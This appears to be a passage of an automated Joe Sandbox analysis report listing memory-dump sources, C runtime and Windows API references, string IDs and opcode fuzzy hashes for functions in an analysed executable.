                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                        • String ID:
                                                                        • API String ID: 2040435927-0
                                                                        • Opcode ID: 08647a71b5fc811efe24b7223b921db19cbd9cf582d2788eea0cb4d5593432ff
                                                                        • Instruction ID: 2634fd599d171369309a3853a0e8745e3d1dfef0827e5737c71c89cd20797ead
                                                                        • Opcode Fuzzy Hash: 08647a71b5fc811efe24b7223b921db19cbd9cf582d2788eea0cb4d5593432ff
                                                                        • Instruction Fuzzy Hash: 3F519372A10206AFDB208F98CC85FAF7BF9EB96750F144899F915A6151DB30CD11CBA0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        • Opcode ID: 2e8523f9e199b17f6625ed6c0ffad96a4a1d4108d1d5b5e50c5b311801a702c8
                                                                        • Instruction ID: e6f11dc681eaffff30e7844435bd472cbb93a1f92af42d013439321d173f15c8
                                                                        • Opcode Fuzzy Hash: 2e8523f9e199b17f6625ed6c0ffad96a4a1d4108d1d5b5e50c5b311801a702c8
                                                                        • Instruction Fuzzy Hash: A8B10432A053959FDB268F64CC81BAAFBE5EF65310F1441E7E904AB382F6759D01C7A0
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC2517
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC251F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC25A8
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC25D3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC2628
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 0778404a348e329fd75feb148ba6d6ad9923a30daf8a4948f05a14ef55cc87f8
                                                                        • Instruction ID: 677041ae42cdb70637612506fa9f29bbac6c13111356a430da3372795bc69eb0
                                                                        • Opcode Fuzzy Hash: 0778404a348e329fd75feb148ba6d6ad9923a30daf8a4948f05a14ef55cc87f8
                                                                        • Instruction Fuzzy Hash: 9E41D234A00258DBCF14DF68C895F9EBBE5EF44324F1481E9E8289B352DB71EA41CB91
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,00BD07C0,00BC990C,0000000C,00000000,C0C2D04E,00000000,?,00BD043E,00000022,FlsSetValue,00BE2EF8,00BE2F00,C0C2D04E), ref: 00BD0772
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: 912375338e29d364a1202794166a3aa307801e5e4141fc544aec135a7ef0da74
                                                                        • Instruction ID: 491d9150e751629b9d0fefe7d464c514121266c3654fc0ae431b4e402a100a18
                                                                        • Opcode Fuzzy Hash: 912375338e29d364a1202794166a3aa307801e5e4141fc544aec135a7ef0da74
                                                                        • Instruction Fuzzy Hash: 3E21D835A11311ABDB21AB65DC85B5ABBD8EF51760F2501A2E825AF391FB30FD01CED0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00BCD1E3,00BC22AA,00BC0E9D), ref: 00BCD1FA
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BCD208
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BCD221
                                                                        • SetLastError.KERNEL32(00000000,00BCD1E3,00BC22AA,00BC0E9D), ref: 00BCD273
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: ed50d7d04ead9736d569fcad29e897fdec22ad90ecbac57f9c1ed49f07ec0f0d
                                                                        • Instruction ID: 2d036e07d21792b1dec88b30f9127f7de0eed5c2fa5798030333d3514b5eec95
                                                                        • Opcode Fuzzy Hash: ed50d7d04ead9736d569fcad29e897fdec22ad90ecbac57f9c1ed49f07ec0f0d
                                                                        • Instruction Fuzzy Hash: 7201D83A1097115EA7242674FCC6E2B6FC4EB01B78B2002BEF5348E1E5FF62CC029540
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,43400BE8,?,?,00000000,00BDFB57,000000FF,?,00BC7B9D,00BC7A84,?,00BC7C39,00000000), ref: 00BC7B11
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC7B23
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00BDFB57,000000FF,?,00BC7B9D,00BC7A84,?,00BC7C39,00000000), ref: 00BC7B45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 1c0d962fb5e748d3c7ad5a7532ecb09e72bd2076295a4b3bbd5672dafc482201
                                                                        • Instruction ID: 964288a6d67e3810e3cd399903337c744b16583513ce5f7a7003d7c7c07463dd
                                                                        • Opcode Fuzzy Hash: 1c0d962fb5e748d3c7ad5a7532ecb09e72bd2076295a4b3bbd5672dafc482201
                                                                        • Instruction Fuzzy Hash: A7018F31944699AFDB018B94CC55FAEBBF8FB04B10F000569E821A32A0DF74A800CA80
                                                                        APIs
                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00BAD0FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___std_exception_destroy
                                                                        • String ID: pE\&$pE\&$pE\&$pE\&
                                                                        • API String ID: 4194217158-2012766030
                                                                        • Opcode ID: fe6d4e7400144646b94ae28f85fdade90fc919945505715735f8c41800b898b9
                                                                        • Instruction ID: 04092c1a22c49d464a69ea900551faa73e7c6369ec0ceb04f2cee63d728efeb8
                                                                        • Opcode Fuzzy Hash: fe6d4e7400144646b94ae28f85fdade90fc919945505715735f8c41800b898b9
                                                                        • Instruction Fuzzy Hash: B101A4F5D182108BCA10AB18E8C2A6A72F0EB56714F050CBAF447EB310E772DC55C79B
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 738035616-0
                                                                        • Opcode ID: 3d65d35d4850c8a089f811c44894d24ddf825a582cc6d9d117bf7dd0558b8024
                                                                        • Instruction ID: 5e0cfa6af5ce9bbcb86bbcfd8641ac382eca39945dc4529d143c4c451c7dd57f
                                                                        • Opcode Fuzzy Hash: 3d65d35d4850c8a089f811c44894d24ddf825a582cc6d9d117bf7dd0558b8024
                                                                        • Instruction Fuzzy Hash: D3016D3291421A9BCB05FB64C895BFE77F1BF94320F64049DE421AB3A2DF749A01CB94
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00BCDDD5,?,?,00000000,00000000,00000000,?), ref: 00BCDEF4
                                                                        • CatchIt.LIBVCRUNTIME ref: 00BCDFDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        • Opcode ID: 2c223a3a4b83b270526c680d847178e6d9d7814d5303b03f38c6e6e975337fc6
                                                                        • Instruction ID: 8e7b59ff5e70292b9a45e4d346dd88dd3d69feb1435e39ff74ddf79f540b7579
                                                                        • Opcode Fuzzy Hash: 2c223a3a4b83b270526c680d847178e6d9d7814d5303b03f38c6e6e975337fc6
                                                                        • Instruction Fuzzy Hash: 19413236900209AFCF16DF98C981EAEBBF5FF48304F1981ADF906A6221D335A950DB50
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00BBF4C0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BBF4CD
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BBF50A
                                                                          • Part of subcall function 00BBECB7: _Yarn.LIBCPMT ref: 00BBECD6
                                                                          • Part of subcall function 00BBECB7: _Yarn.LIBCPMT ref: 00BBECFA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 482894088-1405518554
                                                                        • Opcode ID: 89f93c2ea09f2e125a5299a91d1a9e53f9b1cf3dce7e9013ec5a35f036a5a45d
                                                                        • Instruction ID: 1d6ffabb570f23a6ae3ac9ec79956cb5960e6e4bda35046fd22430dca543b669
                                                                        • Opcode Fuzzy Hash: 89f93c2ea09f2e125a5299a91d1a9e53f9b1cf3dce7e9013ec5a35f036a5a45d
                                                                        • Instruction Fuzzy Hash: AB014F71905B849EC730DF7A848159AFEF0BF28300B548AAEE09E93B52C770A644CB59
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BDA18D,00000000,?,00BF0D38,?,?,?,00BDA0C4,00000004,InitializeCriticalSectionEx,00BE34F4,00BE34FC), ref: 00BDA0FE
                                                                        • GetLastError.KERNEL32(?,00BDA18D,00000000,?,00BF0D38,?,?,?,00BDA0C4,00000004,InitializeCriticalSectionEx,00BE34F4,00BE34FC,00000000,?,00BCE0FC), ref: 00BDA108
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BDA130
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 430a7bec89523e39a5d28f7e3926d93d01f726ff5114bd24f5c3b350ebaff24e
                                                                        • Instruction ID: 0da821cf3428f32fb84bac1e1d0a367be66a9091cc28dc0957817bef42ffa021
                                                                        • Opcode Fuzzy Hash: 430a7bec89523e39a5d28f7e3926d93d01f726ff5114bd24f5c3b350ebaff24e
                                                                        • Instruction Fuzzy Hash: 08E04F30280348BBEF202FA1EC46B1A7ED4FB21B41F144461F90CF91E1FB62A9518985
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(43400BE8,00000000,00000000,?), ref: 00BD7380
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD75D2
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD7618
                                                                        • GetLastError.KERNEL32 ref: 00BD76BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: 4964a660f8f4bb35089afcd26bafb1ee81571e6a90a1c5770e2e19f8cc9c59a3
                                                                        • Instruction ID: 927dd05c79540adc77f007b8d4b92a6c8c58bf1ab5dcb4700cc243a7c097ff52
                                                                        • Opcode Fuzzy Hash: 4964a660f8f4bb35089afcd26bafb1ee81571e6a90a1c5770e2e19f8cc9c59a3
                                                                        • Instruction Fuzzy Hash: BCD15975D046489FCB15CFA8D884AEDFBF5EF09314F2845AAE816EB351FA30A941CB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 30f3363f64594c69e0fce7bb90d3314767a4f80e4f390fe0ca363276a655e978
                                                                        • Instruction ID: ef9679fc03596aadc48ef3cfc465ff8e98842089bcd054c5303f7a0f589b149e
                                                                        • Opcode Fuzzy Hash: 30f3363f64594c69e0fce7bb90d3314767a4f80e4f390fe0ca363276a655e978
                                                                        • Instruction Fuzzy Hash: 0351EE7E604242AFDB288F54D881F7A77E4EF54300F1485BDE9468B291E771EC80C750
                                                                        APIs
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00BD54AE
                                                                        • __dosmaperr.LIBCMT ref: 00BD54B5
                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00BD54EF
                                                                        • __dosmaperr.LIBCMT ref: 00BD54F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1913693674-0
                                                                        • Opcode ID: 7e92b3689e9ec8516acbf4fb9f3206a91eb67e2cdb947e839c80f11c1a01cbad
                                                                        • Instruction ID: d9b70f208c4b10533904d3b2a3e8c13236b056b8d949cc6f83426ca91a215ec1
                                                                        • Opcode Fuzzy Hash: 7e92b3689e9ec8516acbf4fb9f3206a91eb67e2cdb947e839c80f11c1a01cbad
                                                                        • Instruction Fuzzy Hash: CA21A171600A05AF9B31AF659881E6BFBE9FF5536871085AEF819D7350EB30EC408F61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 68a3b7feb40e676d3aed090460605f51d5c40e0c5fef2aa979b527d256d14790
                                                                        • Instruction ID: 7faea19ec2101526fca2aba983740f92e36bcc303ec1c4da612bd83b8f3857f6
                                                                        • Opcode Fuzzy Hash: 68a3b7feb40e676d3aed090460605f51d5c40e0c5fef2aa979b527d256d14790
                                                                        • Instruction Fuzzy Hash: 2E218E31600396AFEB10AF65DCA5F6B77E9EF4136471085ADF929D7150EB30EE408760
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00BD6210
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD6248
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD6268
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
